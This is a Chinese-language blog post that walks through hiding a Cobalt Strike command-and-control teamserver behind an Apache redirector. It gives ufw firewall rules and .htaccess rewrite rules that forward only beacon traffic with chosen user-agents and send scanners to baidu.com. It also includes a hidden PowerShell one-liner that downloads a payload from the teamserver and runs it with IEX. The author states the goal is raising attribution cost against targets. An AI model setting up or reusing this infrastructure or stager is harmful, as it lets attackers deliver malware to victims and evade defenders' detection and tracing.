<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.0.6" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.0.6">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.0.6">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.0.6">


  <link rel="mask-icon" href="/images/logo.svg?v=6.0.6" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.0.6',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="preview由于最近重新申请了数个VPS，故想在踪迹隐藏方面下点功夫。以下图片是目前的通信方式。这算是一个低配版的多级C2。  Redirector有多种选择，一种是使用socat、ssh或者iptables等直接转发的工具，这类工具会将对应的请求包直接转发给目标服务器，不太好做条件转发。另一种是使用apache的mod_rewrite来转发，可以根据UA来进行有条件地转发，因此在这里就介绍一下">
<meta name="keywords" content="technology">
<meta property="og:type" content="article">
<meta property="og:title" content="th-cobaltstrike团队服务器隐匿的实践">
<meta property="og:url" content="localhost/2019/03/18/th-teamserver隐蔽的实践/index.html">
<meta property="og:site_name" content="Kiwings">
<meta property="og:description" content="preview由于最近重新申请了数个VPS，故想在踪迹隐藏方面下点功夫。以下图片是目前的通信方式。这算是一个低配版的多级C2。  Redirector有多种选择，一种是使用socat、ssh或者iptables等直接转发的工具，这类工具会将对应的请求包直接转发给目标服务器，不太好做条件转发。另一种是使用apache的mod_rewrite来转发，可以根据UA来进行有条件地转发，因此在这里就介绍一下">
<meta property="og:locale" content="default">
<meta property="og:image" content="/images/cs_hidden/1.png">
<meta property="og:image" content="/images/cs_hidden/2.png">
<meta property="og:image" content="/images/cs_hidden/3.png">
<meta property="og:updated_time" content="2019-03-19T15:29:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="th-cobaltstrike团队服务器隐匿的实践">
<meta name="twitter:description" content="preview由于最近重新申请了数个VPS，故想在踪迹隐藏方面下点功夫。以下图片是目前的通信方式。这算是一个低配版的多级C2。  Redirector有多种选择，一种是使用socat、ssh或者iptables等直接转发的工具，这类工具会将对应的请求包直接转发给目标服务器，不太好做条件转发。另一种是使用apache的mod_rewrite来转发，可以根据UA来进行有条件地转发，因此在这里就介绍一下">
<meta name="twitter:image" content="/images/cs_hidden/1.png">



  <link rel="alternate" href="/atom.xml" title="Kiwings" type="application/atom+xml">




  <link rel="canonical" href="localhost/2019/03/18/th-teamserver隐蔽的实践/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>th-cobaltstrike团队服务器隐匿的实践 | Kiwings</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> 

<div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Kiwings</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
          
  <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>
</li>

      
        
        
          
  <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>
</li>

      

      
    </ul>
  

  
    

    
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
    

  


  

  
</nav>


  



 </div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="localhost/2019/03/18/th-teamserver隐蔽的实践/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Kiwings">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kiwings">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">th-cobaltstrike团队服务器隐匿的实践</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-18T00:00:00+00:00">2019-03-18</time>
            

            
            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/technology/" itemprop="url" rel="index"><span itemprop="name">technology</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="preview"><a href="#preview" class="headerlink" title="preview"></a>preview</h1><p>由于最近重新申请了数个VPS，故想在踪迹隐藏方面下点功夫。以下图片是目前的通信方式。这算是一个低配版的多级C2。</p>
<p><img src="/images/cs_hidden/1.png" alt="架构简要图"></p>
<p>Redirector有多种选择，一种是使用socat、ssh或者iptables等直接转发的工具，这类工具会将对应的请求包直接转发给目标服务器，不太好做条件转发。<br>另一种是使用apache的mod_rewrite来转发，可以根据UA来进行有条件地转发，因此在这里就介绍一下使用apache的mod_rewrite来搭建重定向服务器的步骤。</p>
<h2 id="Teamserver"><a href="#Teamserver" class="headerlink" title="Teamserver"></a>Teamserver</h2><p>3.13版本之前的cobaltstrike因为存在漏洞而导致全网的teamserver可被扫描识别。为了防止以后发生类似的情况。打算让teamserver只能从redirector访问。从其他IP的任何访问形式直接reject或 deny。</p>
<p>使用ufw配置如下规则</p>
<pre><code>ufw allow ssh //允许任意IP使用ssh登录，如果换了端口号则指定端口号
ufw allow 53/tcp from x.x.x.x //允许53端口接受来自x.x.x.x的tcp包
sudo ufw allow from x.x.x.x to any port 80,81,8080,8081 proto tcp //同上
sudo ufw allow from x.x.x.x to any port 53 proto udp//同上，接受udp包
sudo ufw allow from x.x.x.x to any port [teamserverport] //开启teamserver的端口
sudo ufw default deny //默认返回deny
sudo ufw enable //使用规则
sudo ufw status //查看状态
</code></pre><p>然后再编写profile文件，这里我使用<a href="https://github.com/rsmudge/Malleable-C2-Profiles" target="_blank" rel="noopener">cs作者给出的profile</a>作为例子，推荐大家自己参考各种profile后修改编写属于自己的profile，减少被防火墙识别的概率。编写完后记得使用自带的c2lint进行合格性检查。<br>然后启动teamserver的时候，带上第三个参数，即profile文件路径即可。cs会重载替换对应的默认profile配置。</p>
<h2 id="Redirect"><a href="#Redirect" class="headerlink" title="Redirect"></a>Redirect</h2><h3 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h3><p>安装apache 后，开启apache转发功能。<br>步骤如下：</p>
<ol>
<li>vim /etc/apache2/apache.conf</li>
<li>查找字符串  ?AllowOverride</li>
<li>将AllowOverride None 修改为 AllowOverride All，将Require all 的值设置为 granted。</li>
<li>终端中启动重定向模块 sudo a2enmod rewrite proxy proxy_http</li>
</ol>
<p>然后即可在apache的web根目录下创建.htaccess 文件，内容如下：</p>
<pre><code>RewriteEngine On
RewriteCond %{REQUEST_URI} ^/ __[web payload path]__ /?$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0\ \(compatible;\ MSIE\ 11\.0;\ Windows\ NT\ 6\.3;\ Trident/9\.0\)?$
RewriteRule ^.\*$ http:// __[teamserver ip]__ %{REQUEST_URI} [P]
RewriteCond %{REQUEST_URI} ^/..../?$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0\ \(compatible;\ MSIE\ 11\.0;\ Windows\ NT\ 6\.3;\ Trident/9\.0\)?$
RewriteRule ^.\*$ http:// __[teamserver ip]__ %{REQUEST_URI} [P]
RewriteCond %{REQUEST_URI} ^/(/preload)/?$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4\.0\ \(compatible;\ MSIE\ 6\.0;\ Windows\ NT\ 5\.1;\ SV1;\ InfoPath\.2\)?$
RewriteRule ^.\*$ http:// __[teamserver ip]__ %{REQUEST_URI} [P]
RewriteCond %{REQUEST_URI} ^/(/sa)/?$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4\.0\ \(compatible;\ MSIE\ 6\.0;\ Windows\ NT\ 5\.1;\ SV1;\ InfoPath\.2\)?$
RewriteRule ^.\*$ http:// _[teamserver ip]_ %{REQUEST_URI} [P]
RewriteRule ^.\*$ http:// __[www.baidu.com]__ /? [L,R=302]
</code></pre><p>简单解释一下该规则的含义</p>
<ul>
<li>RewriteCond是判断语句，如果满足条件则执行紧邻着的语句，否则跳过下一行语句。</li>
<li>2-4行用于下载payload阶段，即在cs中使用web delivery 加载payload.</li>
<li>5-7行则用于stager阶段，即下载执行监听器的payload，用….表示接受任意4个字符。这是因为cs中监听器payload加载地址是随机的4个字符。</li>
<li>8-13行则是用于建立连接以后的正常通信请求，这里的请求url可以在profile中定义。</li>
</ul>
<p>加粗的字体表示要修改成自己对应的IP。另外，其实这里的规则可以进一步化简成只判断客户端是否满足我们设定的user-agent即可。</p>
<h3 id="Windows-Server"><a href="#Windows-Server" class="headerlink" title="Windows Server"></a>Windows Server</h3><p>在windows环境中配置apache和ubuntu差不多，只提几个要注意的点，其他的步骤是一样的。<br>Windows中安装完apache后，配置文件是在\Apache24\conf中的httpd.conf，打开配置文件后，先搜索AllowOverride字符串，作出如下修改<br>235行左右的</p>
<p><img src="/images/cs_hidden/2.png" alt="第一个重载"></p>
<p>272行的</p>
<p><img src="/images/cs_hidden/3.png" alt="第二个重载"></p>
<p>AllowOverride和Require要修改成和图上一样的。注意，如果少修改了272行的参数，则在windows下会忽略.htaccess文件。<br>然后在搜索mod_rewrite、mod_proxy、mod_proxy_http、mod_proxy_http2，将最前面的注释去掉，即可加载对应模块。<br>之后则同之前的步骤一样，在web根目录下创建.htaccess文件即可(需要在CMD中创建，不然无法识别格式)。</p>
<h2 id="实践"><a href="#实践" class="headerlink" title="实践"></a>实践</h2><p>然后cobaltstrike中启动监听器的时候，输入的Host填重定向服务器的ip，确认后，弹出的domain输入框中输入重定向服务器的域名(没有域名也可以填入ip)。就可以做到利用重定向服务器与目标进行通信。</p>
<p>另外，由于我在重定向服务器中把stager阶段的UA也给确定了，所以payload加载方式也要做一点变化，要使用如下格式payload:<br>    powershell -nop -w hidden -c “$cli = New-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.3; Trident/9.0)’;$cli.Downloadstring(‘<a href="http://www.teamserver.com/payload" target="_blank" rel="noopener">http://www.teamserver.com/payload</a> ‘)|IEX”</p>
<p>即先设置UA头，再发送请求。注意，这段payload不能在powershell窗口下面加载，会提示语法错误，使用cmd窗口或者其他加载方式即可。<br>这样，客户端上只能捕捉到与重定向服务器交互的流量，隐藏了真实的teamserver IP地址，且直接使用浏览器或者脚本扫描的方式，都不能得到teamserver的正确响应。差异对比的截图我就不放出来了，懒得对公网IP打码。</p>
<p>参考:<a href="https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki/blob/master/README.md" target="_blank" rel="noopener">https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki/blob/master/README.md</a></p>
<hr>
<h1 id="summary"><a href="#summary" class="headerlink" title="summary"></a>summary</h1><p>说一点感受，隐蔽团队服务器，为的就是提高溯源成本。但其实如果只是搞国内的小目标，一般都不需要做转发，因为小目标是不太会去溯源的。但是为了能更贴近大佬们，就要先从基础设施的踩坑开始。<br>这篇文章没有什么技术上的要点，如果非要说有的话，那就是怎么使payload加载方式可以自动修改了。这就要使用到cobaltstrike的cna脚本编写，自己根据资料尝试了一下，发现怎么也调试不出来效果，但是根据反编译的源码来看，明明没错才对。</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/technology/" rel="tag"># technology</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/03/th-cobaltstrike3.13破解/" rel="next" title="th-cobaltsrike3.13破解事项">
                <i class="fa fa-chevron-left"></i> th-cobaltsrike3.13破解事项
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/04/th-DLL劫持/" rel="prev" title="th-DLL劫持">
                th-DLL劫持 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Kiwings</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#preview"><span class="nav-number">1.</span> <span class="nav-text">preview</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Teamserver"><span class="nav-number">1.1.</span> <span class="nav-text">Teamserver</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Redirect"><span class="nav-number">1.2.</span> <span class="nav-text">Redirect</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Ubuntu"><span class="nav-number">1.2.1.</span> <span class="nav-text">Ubuntu</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Windows-Server"><span class="nav-number">1.2.2.</span> <span class="nav-text">Windows Server</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实践"><span class="nav-number">1.3.</span> <span class="nav-text">实践</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#summary"><span class="nav-number">2.</span> <span class="nav-text">summary</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kiwings</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Muse</a> v6.0.6</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.0.6"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.0.6"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.0.6"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.0.6"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.0.6"></script>



  



	





  





  










  





  

  

  

  

  
  

  

  

  

  

</body>
</html>
